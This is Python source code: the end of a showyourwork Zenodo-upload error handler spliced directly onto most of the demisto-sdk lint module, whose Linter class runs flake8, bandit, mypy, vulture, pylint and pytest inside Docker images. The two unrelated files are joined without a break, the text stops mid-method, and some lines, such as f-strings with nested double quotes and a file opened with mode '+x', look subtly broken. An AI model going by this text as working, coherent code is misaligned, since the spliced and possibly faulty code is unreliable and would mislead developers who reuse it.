context="This error occurred because showyourwork tried to "
f"upload the file {file_name} to Zenodo under a deposit with id "
f"{snakemake.params['deposit_id']}, but the current user does "
"not have the correct authentication. The API token for Zenodo "
f"should be stored in the environment variable {snakemake.params['token_name']}, "
"but this token is either missing or invalid for editing the given "
"deposit id. If you are a third-party user (i.e., you cloned someone "
"else's repository and are attempting to build the paper locally), you "
"can either run ``make fast`` "
"to skip the dataset generation & upload step, "
"change the relevant `id` key in the config file to a specific *version* id "
"for the deposit, "
"or provide a concept id which you are authorized to edit; "
"to reserve an id under "
"your authentication, simply type `make reserve`. See the docs for more "
"details.",
brief=f"Unable to upload {file_name} to Zenodo.",
)
else:
raise e |
# STD python packages
import copy
import hashlib
import io
import json
import logging
import os
import platform
import time
import traceback
from copy import deepcopy
from typing import Any, Dict, List, Optional, Tuple
# 3-rd party packages
import docker
import docker.errors
import docker.models.containers
import requests.exceptions
import urllib3.exceptions
from demisto_sdk.commands.common.constants import (INTEGRATIONS_DIR,
PACKS_PACK_META_FILE_NAME,
TYPE_PWSH, TYPE_PYTHON)
# Local packages
from demisto_sdk.commands.common.tools import (get_all_docker_images,
run_command_os)
from demisto_sdk.commands.lint.commands_builder import (
build_bandit_command, build_flake8_command, build_mypy_command,
build_pwsh_analyze_command, build_pwsh_test_command, build_pylint_command,
build_pytest_command, build_vulture_command, build_xsoar_linter_command)
from demisto_sdk.commands.lint.helpers import (EXIT_CODES, FAIL, RERUN, RL,
SUCCESS, WARNING,
add_tmp_lint_files,
add_typing_module,
get_file_from_container,
get_python_version_from_image,
pylint_plugin,
split_warnings_errors,
stream_docker_container_output)
from jinja2 import Environment, FileSystemLoader, exceptions
from ruamel.yaml import YAML
from wcmatch.pathlib import NEGATE, Path
logger = logging.getLogger('demisto-sdk')
class Linter:
""" Linter used to activate lint command on single package
Attributes:
pack_dir(Path): Pack to run lint on.
content_repo(Path): Git repo object of content repo.
req_2(list): requirements for docker using python2.
req_3(list): requirements for docker using python3.
docker_engine(bool): Whether docker engine detected by docker-sdk.
"""
def __init__(self, pack_dir: Path, content_repo: Path, req_3: list, req_2: list, docker_engine: bool):
self._req_3 = req_3
self._req_2 = req_2
self._content_repo = content_repo
self._pack_abs_dir = pack_dir
self._pack_name = None
# Docker client init
if docker_engine:
self._docker_client: docker.DockerClient = docker.from_env()
self._docker_hub_login = self._docker_login()
# Facts gathered regarding pack lint and test
self._facts: Dict[str, Any] = {
"images": [],
"python_version": 0,
"env_vars": {},
"test": False,
"lint_files": [],
"support_level": None,
"is_long_running": False,
"lint_unittest_files": [],
"additional_requirements": [],
"docker_engine": docker_engine,
"is_script": False,
"commands": None
}
# Pack lint status object - visualize it
self._pkg_lint_status: Dict = {
"pkg": None,
"pack_type": None,
"path": str(self._content_repo),
"errors": [],
"images": [],
"flake8_errors": None,
"XSOAR_linter_errors": None,
"bandit_errors": None,
"mypy_errors": None,
"vulture_errors": None,
"flake8_warnings": None,
"XSOAR_linter_warnings": None,
"bandit_warnings": None,
"mypy_warnings": None,
"vulture_warnings": None,
"exit_code": SUCCESS,
"warning_code": SUCCESS,
}
def run_dev_packages(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_pylint: bool, no_vulture: bool,
no_xsoar_linter: bool, no_pwsh_analyze: bool, no_pwsh_test: bool, no_test: bool, modules: dict,
keep_container: bool, test_xml: str) -> dict:
""" Run lint and tests on single package
Performing the follow:
1. Run the lint on OS - flake8, bandit, mypy.
2. Run in package docker - pylint, pytest.
Args:
no_flake8(bool): Whether to skip flake8
no_bandit(bool): Whether to skip bandit
no_mypy(bool): Whether to skip mypy
no_vulture(bool): Whether to skip vulture
no_pylint(bool): Whether to skip pylint
no_test(bool): Whether to skip pytest
no_pwsh_analyze(bool): Whether to skip powershell code analyzing
no_pwsh_test(bool): whether to skip powershell tests
modules(dict): Mandatory modules to locate in pack path (CommonServerPython.py etc)
keep_container(bool): Whether to keep the test container
test_xml(str): Path for saving pytest xml results
Returns:
dict: lint and test all status, pkg status)
"""
# Gather information for lint check information
skip = self._gather_facts(modules)
# If not python pack - skip pack
if skip:
return self._pkg_lint_status
try:
# Locate mandatory files in pack path - for more info checkout the context manager LintFiles
with add_tmp_lint_files(content_repo=self._content_repo, # type: ignore
pack_path=self._pack_abs_dir,
lint_files=self._facts["lint_files"],
modules=modules,
pack_type=self._pkg_lint_status["pack_type"]):
# Run lint check on host - flake8, bandit, mypy
if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._run_lint_in_host(no_flake8=no_flake8,
no_bandit=no_bandit,
no_mypy=no_mypy,
no_vulture=no_vulture,
no_xsoar_linter=no_xsoar_linter)
# Run lint and test check on pack docker image
if self._facts["docker_engine"]:
self._run_lint_on_docker_image(no_pylint=no_pylint,
no_test=no_test,
no_pwsh_analyze=no_pwsh_analyze,
no_pwsh_test=no_pwsh_test,
keep_container=keep_container,
test_xml=test_xml)
except Exception as ex:
err = f'{self._pack_abs_dir}: Unexpected fatal exception: {str(ex)}'
logger.error(f"{err}. Traceback: {traceback.format_exc()}")
self._pkg_lint_status["errors"].append(err)
self._pkg_lint_status['exit_code'] += FAIL
return self._pkg_lint_status
def _gather_facts(self, modules: dict) -> bool:
""" Gathering facts about the package - python version, docker images, valid docker image, yml parsing
Args:
modules(dict): Test mandatory modules to be ignore in lint check
Returns:
bool: Indicating if to continue further or not, if False exit Thread, Else continue.
"""
# Looking for pkg yaml
yml_file: Optional[Path] = self._pack_abs_dir.glob([r'*.yaml', r'*.yml', r'!*unified*.yml'], flags=NEGATE)
if not yml_file:
logger.info(f"{self._pack_abs_dir} - Skipping no yaml file found {yml_file}")
self._pkg_lint_status["errors"].append('Unable to find yml file in package')
return True
else:
try:
yml_file = next(yml_file)
except StopIteration:
return True
# Get pack name
self._pack_name = yml_file.stem
log_prompt = f"{self._pack_name} - Facts"
self._pkg_lint_status["pkg"] = yml_file.stem
logger.info(f"{log_prompt} - Using yaml file {yml_file}")
# Parsing pack yaml - in order to verify if check needed
try:
script_obj: Dict = {}
yml_obj: Dict = YAML().load(yml_file)
if isinstance(yml_obj, dict):
script_obj = yml_obj.get('script', {}) if isinstance(yml_obj.get('script'), dict) else yml_obj
self._facts['is_script'] = True if 'Scripts' in yml_file.parts else False
self._facts['is_long_running'] = script_obj.get('longRunning')
self._facts['commands'] = self._get_commands_list(script_obj)
self._pkg_lint_status["pack_type"] = script_obj.get('type')
except (FileNotFoundError, IOError, KeyError):
self._pkg_lint_status["errors"].append('Unable to parse package yml')
return True
# return no check needed if not python pack
if self._pkg_lint_status["pack_type"] not in (TYPE_PYTHON, TYPE_PWSH):
logger.info(f"{log_prompt} - Skipping due to not Python, Powershell package - Pack is"
f" {self._pkg_lint_status["pack_type"]}")
return True
# Docker images
if self._facts["docker_engine"]:
logger.info(f"{log_prompt} - Pulling docker images, can take up to 1-2 minutes if not exists locally ")
self._facts["images"] = [[image, -1] for image in get_all_docker_images(script_obj=script_obj)]
# Gather environment variables for docker execution
self._facts["env_vars"] = {
"CI": os.getenv("CI", False),
"DEMISTO_LINT_UPDATE_CERTS": os.getenv('DEMISTO_LINT_UPDATE_CERTS', "yes")
}
lint_files = set()
# Facts for python pack
if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._update_support_level()
if self._facts["docker_engine"]:
# Getting python version from docker image - verifying if not valid docker image configured
for image in self._facts["images"]:
py_num: float = get_python_version_from_image(image=image[0])
image[1] = py_num
logger.info(f"{self._pack_name} - Facts - {image[0]} - Python {py_num}")
if not self._facts["python_version"]:
self._facts["python_version"] = py_num
# Checking whatever *test* exists in package
self._facts["test"] = True if next(self._pack_abs_dir.glob([r'test_*.py', r'*_test.py']),
None) else False
if self._facts["test"]:
logger.info(f"{log_prompt} - Tests found")
else:
logger.info(f"{log_prompt} - Tests not found")
# Gather package requirements embedded test-requirements.py file
test_requirements = self._pack_abs_dir / 'test-requirements.txt'
if test_requirements.exists():
try:
additional_req = test_requirements.read_text(encoding='utf-8').strip().split('\n')
self._facts["additional_requirements"].extend(additional_req)
logger.info(f"{log_prompt} - Additional package Pypi packages found - {additional_req}")
except (FileNotFoundError, IOError):
self._pkg_lint_status["errors"].append('Unable to parse test-requirements.txt in package')
elif not self._facts["python_version"]:
# get python version from yml
pynum = 3.7 if (script_obj.get('subtype', 'python3') == 'python3') else 2.7
self._facts["python_version"] = pynum
logger.info(f"{log_prompt} - Using python version from yml: {pynum}")
# Get lint files
lint_files = set(self._pack_abs_dir.glob(["*.py", "!__init__.py", "!*.tmp"],
flags=NEGATE))
# Facts for Powershell pack
elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
# Get lint files
lint_files = set(
self._pack_abs_dir.glob(["*.ps1", "!*Tests.ps1", "CommonServerPowerShell.ps1", "demistomock.ps1'"],
flags=NEGATE))
# Add CommonServer to the lint checks
if 'commonserver' in self._pack_abs_dir.name.lower():
# Powershell
if self._pkg_lint_status["pack_type"] == TYPE_PWSH:
self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPowerShell.ps1')]
# Python
elif self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
self._facts["lint_files"] = [Path(self._pack_abs_dir / 'CommonServerPython.py')]
else:
test_modules = {self._pack_abs_dir / module.name for module in modules.keys()}
lint_files = lint_files.difference(test_modules)
self._facts["lint_files"] = list(lint_files)
if self._facts["lint_files"]:
for lint_file in self._facts["lint_files"]:
logger.info(f"{log_prompt} - Lint file {lint_file}")
else:
logger.info(f"{log_prompt} - Lint files not found")
self._split_lint_files()
return False
def _split_lint_files(self):
""" Remove unit test files from _facts['lint_files'] and put into their own list _facts['lint_unittest_files']
This is because not all lints should be done on unittest files.
"""
lint_files_list = deepcopy(self._facts["lint_files"])
for lint_file in lint_files_list:
if lint_file.name.startswith('test_') or lint_file.name.endswith('_test.py'):
self._facts['lint_unittest_files'].append(lint_file)
self._facts["lint_files"].remove(lint_file)
def _run_lint_in_host(self, no_flake8: bool, no_bandit: bool, no_mypy: bool, no_vulture: bool,
no_xsoar_linter: bool):
""" Run lint check on host
Args:
no_flake8(bool): Whether to skip flake8.
no_bandit(bool): Whether to skip bandit.
no_mypy(bool): Whether to skip mypy.
no_vulture(bool): Whether to skip Vulture.
"""
warning = []
error = []
other = []
exit_code: int = 0
for lint_check in ["flake8", "XSOAR_linter", "bandit", "mypy", "vulture"]:
exit_code = SUCCESS
output = ""
if self._facts["lint_files"] or self._facts["lint_unittest_files"]:
if lint_check == "flake8" and not no_flake8:
flake8_lint_files = copy.deepcopy(self._facts["lint_files"])
# if there are unittest.py then we would run flake8 on them too.
if self._facts['lint_unittest_files']:
flake8_lint_files.extend(self._facts['lint_unittest_files'])
exit_code, output = self._run_flake8(py_num=self._facts["python_version"], lint_files=flake8_lint_files)
if self._facts["lint_files"]:
if lint_check == "XSOAR_linter" and not no_xsoar_linter:
exit_code, output = self._run_xsoar_linter(py_num=self._facts["python_version"],
lint_files=self._facts["lint_files"])
elif lint_check == "bandit" and not no_bandit:
exit_code, output = self._run_bandit(lint_files=self._facts["lint_files"])
elif lint_check == "mypy" and not no_mypy:
exit_code, output = self._run_mypy(py_num=self._facts["python_version"],
lint_files=self._facts["lint_files"])
elif lint_check == "vulture" and not no_vulture:
exit_code, output = self._run_vulture(py_num=self._facts["python_version"],
lint_files=self._facts["lint_files"])
# check for any exit code other than 0
if exit_code:
error, warning, other = split_warnings_errors(output)
if exit_code and warning:
self._pkg_lint_status["warning_code"] |= EXIT_CODES[lint_check]
self._pkg_lint_status[f"{lint_check}_warnings"] = "\n".join(warning)
if exit_code & FAIL:
self._pkg_lint_status["exit_code"] |= EXIT_CODES[lint_check]
# if the error were extracted correctly as they start with E
if error:
self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(error)
# if there were errors but they do not start with E
else:
self._pkg_lint_status[f"{lint_check}_errors"] = "\n".join(other)
def _run_flake8(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Runs flake8 in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Flake8"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_flake8_command(lint_files, py_num),
cwd=self._content_repo)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_xsoar_linter(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Runs Xsaor linter in pack dir
Args:
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Xsoar linter errors
"""
status = SUCCESS
FAIL_PYLINT = 0b10
with pylint_plugin(self._pack_abs_dir):
log_prompt = f"{self._pack_name} - XSOAR Linter"
logger.info(f"{log_prompt} - Start")
myenv = os.environ.copy()
if myenv.get('PYTHONPATH'):
myenv['PYTHONPATH'] += ':' + str(self._pack_abs_dir)
else:
myenv['PYTHONPATH'] = str(self._pack_abs_dir)
if self._facts['is_long_running']:
myenv['LONGRUNNING'] = 'True'
if py_num < 3:
myenv['PY2'] = 'True'
myenv['is_script'] = str(self._facts['is_script'])
# as Xsoar checker is a pylint plugin and runs as part of pylint code, we can not pass args to it.
# as a result we can use the env vars as a getway.
myenv['commands'] = ','.join([str(elem) for elem in self._facts['commands']]) \
if self._facts['commands'] else ''
stdout, stderr, exit_code = run_command_os(
command=build_xsoar_linter_command(lint_files, py_num, self._facts.get('support_level', 'base')),
cwd=self._pack_abs_dir, env=myenv)
if exit_code & FAIL_PYLINT:
logger.info(f"{log_prompt}- Finished errors found")
status = FAIL
if exit_code & WARNING:
logger.info(f"{log_prompt} - Finished warnings found")
if not status:
status = WARNING
# if pylint did not run and failure exit code has been returned from run commnad
elif exit_code & FAIL:
status = FAIL
# for contrib prs which are not merged from master and do not have pylint in dev-requirements-py2.
if os.environ.get('CI'):
stdout = "Xsoar linter could not run, Please merge from master"
else:
stdout = "Xsoar linter could not run, please make sure you have" \
" the necessary Pylint version for both py2 and py3"
logger.info(f"{log_prompt}- Finished errors found")
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if not exit_code:
logger.info(f"{log_prompt} - Successfully finished")
return status, stdout
def _run_bandit(self, lint_files: List[Path]) -> Tuple[int, str]:
""" Run bandit in pack dir
Args:
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Bandit"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_bandit_command(lint_files),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_mypy(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Run mypy in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Bandit errors
"""
log_prompt = f"{self._pack_name} - Mypy"
logger.info(f"{log_prompt} - Start")
with add_typing_module(lint_files=lint_files, python_version=py_num):
stdout, stderr, exit_code = run_command_os(command=build_mypy_command(files=lint_files, version=py_num),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_vulture(self, py_num: float, lint_files: List[Path]) -> Tuple[int, str]:
""" Run mypy in pack dir
Args:
py_num(float): The python version in use
lint_files(List[Path]): file to perform lint
Returns:
int: 0 on successful else 1, errors
str: Vulture errors
"""
log_prompt = f"{self._pack_name} - Vulture"
logger.info(f"{log_prompt} - Start")
stdout, stderr, exit_code = run_command_os(command=build_vulture_command(files=lint_files,
pack_path=self._pack_abs_dir,
py_num=py_num),
cwd=self._pack_abs_dir)
logger.debug(f"{log_prompt} - Finished exit-code: {exit_code}")
logger.debug(f"{log_prompt} - Finished stdout: {RL if stdout else ""}{stdout}")
logger.debug(f"{log_prompt} - Finished stderr: {RL if stderr else ""}{stderr}")
if stderr or exit_code:
logger.info(f"{log_prompt}- Finished Finished errors found")
if stderr:
return FAIL, stderr
else:
return FAIL, stdout
logger.info(f"{log_prompt} - Successfully finished")
return SUCCESS, ""
def _run_lint_on_docker_image(self, no_pylint: bool, no_test: bool, no_pwsh_analyze: bool, no_pwsh_test: bool,
keep_container: bool, test_xml: str):
""" Run lint check on docker image
Args:
no_pylint(bool): Whether to skip pylint
no_test(bool): Whether to skip pytest
no_pwsh_analyze(bool): Whether to skip powershell code analyzing
no_pwsh_test(bool): whether to skip powershell tests
keep_container(bool): Whether to keep the test container
test_xml(str): Path for saving pytest xml results
"""
for image in self._facts["images"]:
# Docker image status - visualize
status = {
"image": image[0],
"image_errors": "",
"pylint_errors": "",
"pytest_errors": "",
"pytest_json": {},
"pwsh_analyze_errors": "",
"pwsh_test_errors": ""
}
# Creating image if pylint specified or found tests and tests specified
image_id = ""
errors = ""
for trial in range(2):
image_id, errors = self._docker_image_create(docker_base_image=image)
if not errors:
break
if image_id and not errors:
# Set image creation status
for check in ["pylint", "pytest", "pwsh_analyze", "pwsh_test"]:
exit_code = SUCCESS
output = ""
for trial in range(2):
if self._pkg_lint_status["pack_type"] == TYPE_PYTHON:
# Perform pylint
if not no_pylint and check == "pylint" and self._facts["lint_files"]:
exit_code, output = self._docker_run_pylint(test_image=image_id,
keep_container=keep_container)
# Perform pytest
elif not no_test and self._facts["test"] and check == "pytest":
exit_code, output, test_json = self._docker_run_pytest(test_image=image_id,
keep_container=keep_container,
test_xml=test_xml)
status["pytest_json"] = test_json
elif self._pkg_lint_status["pack_type"] == TYPE_PWSH:
# Perform powershell analyze
if not no_pwsh_analyze and check == "pwsh_analyze" and self._facts["lint_files"]:
exit_code, output = self._docker_run_pwsh_analyze(test_image=image_id,
keep_container=keep_container)
# Perform powershell test
elif not no_pwsh_test and check == "pwsh_test":
exit_code, output = self._docker_run_pwsh_test(test_image=image_id,
keep_container=keep_container)
# If lint check perfrom and failed on reason related to enviorment will run twice,
# But it failing in second time it will count as test failure.
if (exit_code == RERUN and trial == 1) or exit_code == FAIL or exit_code == SUCCESS:
if exit_code in [RERUN, FAIL]:
self._pkg_lint_status["exit_code"] |= EXIT_CODES[check]
status[f"{check}_errors"] = output
break
else:
status["image_errors"] = str(errors)
self._pkg_lint_status["exit_code"] += EXIT_CODES["image"]
# Add image status to images
self._pkg_lint_status["images"].append(status)
try:
self._docker_client.images.remove(image_id)
except (docker.errors.ImageNotFound, docker.errors.APIError):
pass
def _docker_login(self) -> bool:
""" Login to docker-hub using environment variables:
1. DOCKERHUB_USER - User for docker hub.
2. DOCKERHUB_PASSWORD - Password for docker-hub.
Used in Circle-CI for pushing into repo devtestdemisto
Returns:
bool: True if logged in successfully.
"""
docker_user = os.getenv('DOCKERHUB_USER')
docker_pass = os.getenv('DOCKERHUB_PASSWORD')
try:
self._docker_client.login(username=docker_user,
password=docker_pass,
registry="https://index.docker.io/v1")
return self._docker_client.ping()
except docker.errors.APIError:
return False
def _docker_image_create(self, docker_base_image: List[Any]) -> Tuple[str, str]:
""" Create docker image:
1. Installing 'build base' if required in alpine images version - https://wiki.alpinelinux.org/wiki/GCC
2. Installing pypi packs - if only pylint required - only pylint installed otherwise all pytest and pylint
installed, packages which being install can be found in path demisto_sdk/commands/lint/dev_envs
3. The docker image build done by Dockerfile template located in
demisto_sdk/commands/lint/templates/dockerfile.jinja2
Args:
docker_base_image(list): docker image to use as base for installing dev deps and python version.
Returns:
str, str. image name to use and errors string.
"""
log_prompt = f"{self._pack_name} - Image create"
test_image_id = ""
# Get requirements file for image
requirements = []
if 2 < docker_base_image[1] < 3:
requirements = self._req_2
elif docker_base_image[1] > 3:
requirements = self._req_3
# Using DockerFile template
file_loader = FileSystemLoader(Path(__file__).parent / 'templates')
env = Environment(loader=file_loader, lstrip_blocks=True, trim_blocks=True, autoescape=True)
template = env.get_template('dockerfile.jinja2')
try:
dockerfile = template.render(image=docker_base_image[0],
pypi_packs=requirements + self._facts["additional_requirements"],
pack_type=self._pkg_lint_status["pack_type"],
copy_pack=False)
except exceptions.TemplateError as e:
logger.debug(f"{log_prompt} - Error when build image - {e.message()}")
return test_image_id, str(e)
# Trying to pull image based on dockerfile hash, will check if something changed
errors = ""
test_image_name = f'devtest{docker_base_image[0]}-{hashlib.md5(dockerfile.encode('utf-8')).hexdigest()}'
test_image = None
try:
logger.info(f"{log_prompt} - Trying to pull existing image {test_image_name}")
test_image = self._docker_client.images.pull(test_image_name)
except (docker.errors.APIError, docker.errors.ImageNotFound):
logger.info(f"{log_prompt} - Unable to find image {test_image_name}")
# Creatng new image if existing image isn't found
if not test_image:
logger.info(
f"{log_prompt} - Creating image based on {docker_base_image[0]} - Could take 2-3 minutes at first "
f"time")
try:
with io.BytesIO() as f:
f.write(dockerfile.encode('utf-8'))
f.seek(0)
self._docker_client.images.build(fileobj=f,
tag=test_image_name,
forcerm=True)
if self._docker_hub_login:
for trial in range(2):
try:
self._docker_client.images.push(test_image_name)
logger.info(f"{log_prompt} - Image {test_image_name} pushed to repository")
break
except (requests.exceptions.ConnectionError, urllib3.exceptions.ReadTimeoutError):
logger.info(f"{log_prompt} - Unable to push image {test_image_name} to repository")
except (docker.errors.BuildError, docker.errors.APIError, Exception) as e:
logger.critical(f"{log_prompt} - Build errors occurred {e}")
errors = str(e)
else:
logger.info(f"{log_prompt} - Found existing image {test_image_name}")
dockerfile_path = Path(self._pack_abs_dir / ".Dockerfile")
dockerfile = template.render(image=test_image_name,
copy_pack=True)
with open(file=dockerfile_path, mode="+x") as file:
file.write(str(dockerfile))
# we only do retries in CI env where docker build is sometimes flacky
build_tries = int(os.getenv('DEMISTO_SDK_DOCKER_BUILD_TRIES', 3)) if os.getenv('CI') else 1
for trial in range(build_tries):
try:
logger.info(f"{log_prompt} - Copy pack dir to image {test_image_name}")
docker_image_final = self._docker_client.images.build(path=str(dockerfile_path.parent),
dockerfile=dockerfile_path.stem,
forcerm=True)
test_image_name = docker_image_final[0].short_id
break
except Exception as e:
logger.exception(f"{log_prompt} - errors occurred when building image in dir {e}")
if trial >= build_tries:
errors = str(e)
else:
logger.info(f"{log_prompt} - sleeping 2 seconds and will retry build after")
time.sleep(2)
if dockerfile_path.exists():
dockerfile_path.unlink()
if test_image_id:
logger.info(f"{log_prompt} - Image {test_image_id} created successfully")
return test_image_name, errors
def _docker_remove_container(self, container_name: str):
try:
container_obj = self._docker_client.containers.get(container_name)
container_obj.remove(force=True)
except docker.errors.NotFound:
pass
except requests.exceptions.ChunkedEncodingError as err:
# see: https://github.com/docker/docker-py/issues/2696#issuecomment-721322548
if platform.system() != 'Darwin' or 'Connection broken' not in str(err):
raise
def _docker_run_pylint(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
""" Run Pylint in created test image
Args:
test_image(str): test image id/name
keep_container(bool): True if to keep container after execution finished
Returns:
int: 0 on successful, errors 1, need to retry 2
str: Container log
"""
log_prompt = f'{self._pack_name} - Pylint - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pylint"
# Check if previous run left container a live if it do, we remove it
self._docker_remove_container(container_name)
# Run container
exit_code = SUCCESS
output = ""
try:
container_obj: docker.models.containers.Container = self._docker_client.containers.run(
name=container_name,
image=test_image,
command=[
build_pylint_command(
self._facts["lint_files"], docker_version=self._facts.get('python_version'))
],
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"]
)
stream_docker_container_output(container_obj.logs(stream=True))
# wait for container to finish
container_status = container_obj.wait(condition="exited")
# Get container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
container_log = container_obj.logs().decode("utf-8")
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code in [1, 2]:
# 1-fatal message issued
# 2-Error message issued
exit_code = FAIL
output = container_log
logger.info(f"{log_prompt} - Finished errors found")
elif container_exit_code in [4, 8, 16]:
# 4-Warning message issued
# 8-refactor message issued
# 16-convention message issued
logger.info(f"{log_prompt} - Successfully finished - warnings found")
exit_code = SUCCESS
elif container_exit_code == 32:
# 32-usage error
logger.critical(f"{log_prompt} - Finished - Usage error")
exit_code = RERUN
else:
logger.info(f"{log_prompt} - Successfully finished")
# Keeping container if needed or remove it
if keep_container:
print(f"{log_prompt} - container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to delete container - {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run pylint - {e}")
exit_code = RERUN
output = str(e)
return exit_code, output
def _docker_run_pytest(self, test_image: str, keep_container: bool, test_xml: str) -> Tuple[int, str, dict]:
""" Run Pytest in created test image
Args:
test_image(str): Test image id/name
keep_container(bool): True if to keep container after execution finished
test_xml(str): Xml saving path
Returns:
int: 0 on successful, errors 1, need to retry 2
str: Unit test json report
"""
log_prompt = f'{self._pack_name} - Pytest - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pytest"
# Check if previous run left container a live if it does, Remove it
self._docker_remove_container(container_name)
# Collect tests
exit_code = SUCCESS
output = ''
test_json = {}
try:
# Running pytest container
container_obj: docker.models.containers.Container = self._docker_client.containers.run(name=container_name,
image=test_image,
command=[
build_pytest_command(test_xml=test_xml, json=True)],
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"])
stream_docker_container_output(container_obj.logs(stream=True))
# Waiting for container to be finished
container_status: dict = container_obj.wait(condition="exited")
# Getting container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code in [0, 1, 2, 5]:
# 0-All tests passed
# 1-Tests were collected and run but some of the tests failed
# 2-Test execution was interrupted by the user
# 5-No tests were collected
if test_xml:
test_data_xml = get_file_from_container(container_obj=container_obj,
container_path="/devwork/report_pytest.xml")
xml_apth = Path(test_xml) / f'{self._pack_name}_pytest.xml'
with open(file=xml_apth, mode='bw') as f:
f.write(test_data_xml) # type: ignore
test_json = json.loads(get_file_from_container(container_obj=container_obj,
container_path="/devwork/report_pytest.json",
encoding="utf-8"))
for test in test_json.get('report', {}).get("tests"):
if test.get("call", {}).get("longrepr"):
test["call"]["longrepr"] = test["call"]["longrepr"].split('\n')
if container_exit_code in [0, 5]:
logger.info(f"{log_prompt} - Successfully finished")
exit_code = SUCCESS
elif container_exit_code in [2]:
output = container_obj.logs().decode('utf-8')
exit_code = FAIL
else:
logger.info(f"{log_prompt} - Finished errors found")
exit_code = FAIL
elif container_exit_code in [3, 4]:
# 3-Internal error happened while executing tests
# 4-pytest command line usage error
logger.critical(f"{log_prompt} - Usage error")
exit_code = RERUN
output = container_obj.logs().decode('utf-8')
# Remove container if not needed
if keep_container:
print(f"{log_prompt} - Container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
logger.critical(f"{log_prompt} - Unable to remove container {e}")
except (docker.errors.ImageNotFound, docker.errors.APIError) as e:
logger.critical(f"{log_prompt} - Unable to run pytest container {e}")
exit_code = RERUN
return exit_code, output, test_json
def _docker_run_pwsh_analyze(self, test_image: str, keep_container: bool) -> Tuple[int, str]:
""" Run Powershell code analyze in created test image
Args:
test_image(str): test image id/name
keep_container(bool): True if to keep container after excution finished
Returns:
int: 0 on successful, errors 1, need to retry 2
str: Container log
"""
log_prompt = f'{self._pack_name} - Powershell analyze - Image {test_image}'
logger.info(f"{log_prompt} - Start")
container_name = f"{self._pack_name}-pwsh-analyze"
# Check if previous run left container a live if it do, we remove it
container_obj: docker.models.containers.Container
try:
container_obj = self._docker_client.containers.get(container_name)
container_obj.remove(force=True)
except docker.errors.NotFound:
pass
# Run container
exit_code = SUCCESS
output = ""
try:
container_obj = self._docker_client.containers.run(name=container_name,
image=test_image,
command=build_pwsh_analyze_command(
self._facts["lint_files"][0]),
user=f"{os.getuid()}:4000",
detach=True,
environment=self._facts["env_vars"])
stream_docker_container_output(container_obj.logs(stream=True))
# wait for container to finish
container_status = container_obj.wait(condition="exited")
# Get container exit code
container_exit_code = container_status.get("StatusCode")
# Getting container logs
container_log = container_obj.logs().decode("utf-8")
logger.info(f"{log_prompt} - exit-code: {container_exit_code}")
if container_exit_code:
# 1-fatal message issued
# 2-Error message issued
logger.info(f"{log_prompt} - Finished errors found")
output = container_log
exit_code = FAIL
else:
logger.info(f"{log_prompt} - Successfully finished")
# Keeping container if needed or remove it
if keep_container:
print(f"{log_prompt} - container name {container_name}")
else:
try:
container_obj.remove(force=True)
except docker.errors.NotFound as e:
